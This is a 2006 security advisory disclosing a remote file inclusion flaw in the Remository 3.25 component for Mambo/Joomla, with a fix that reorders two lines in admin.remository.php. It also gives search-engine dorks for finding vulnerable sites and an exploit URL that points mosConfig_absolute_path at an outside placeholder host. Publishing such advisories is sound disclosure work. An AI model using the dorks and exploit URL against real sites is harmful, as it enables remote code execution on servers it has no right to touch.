.:[ insecurity research team ]:.

     .__..____.:.______.____.:.____ .

 .:. |  |/    \:/  ___// __ \:/   _\.:.

   : |  |   |  \\____\\  ___/\   /__ :. .

 ..: |__|___|  /____  >\___  >\___  >.:

   .:.. ..  .\/   .:\/:.  .\/.  .:\/:

 .   ...:.    .advisory.    .:...

         :..................: o9.o8.2oo6 ..

 

 

  Affected Application: Remository v3.25 


       (Mambo/Joomla CMS Component)

 

 

 . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .

 

 

  Discoverd by: camino

 

  Team: Insecurity Research Team

 

  URL: http://www.insecurityresearch.org

 

  E-Mail: [EMAIL PROTECTED]

 

 

 

 . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .

 

 

  Typ: Remote [x]  Local [ ]

 

       Remote File Inclusion [x]  SQL Injection [ ]

 

  Level: Low [ ]  Middle [x]  High [ ]

 

  Application: Remository

 

  Version: 3.25

 

  Vulnerable File: admin.remository.php

 

  URL: http://www.remository.com

 

  Description: It's a component that works with Mambo CMS 4.5+ to 


               provide a selection of files that users can download. 

 

  Dork: intext:"Remository 3.25. is technology by Black Sheep Research"


        inurl:"com_remository"

 

 

 

 . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .

 

 

  http://[sitepath]/[joomlapath]/administrator/components/


  com_remository/admin.remository.php?mosConfig_absolute_path=http://huh?

 

 

 

 . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .

 

 

  o1.) open admin.remository.php

 

  o2.) take a look at line 16:


       require_once ($mosConfig_absolute_path.'/components/


       com_remository/com_remository_constants.php');

 

  o3.) take a look at line 19:


       defined( '_VALID_MOS' ) or die( 'Direct Access to this location 

 

       is not allowed.' );

 

  o4.) exchange line 19 with line 16!

 

 

 

 . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .

 

 

  brOmstar and all the sexy members of insecurity research team ;-)

Reply via email to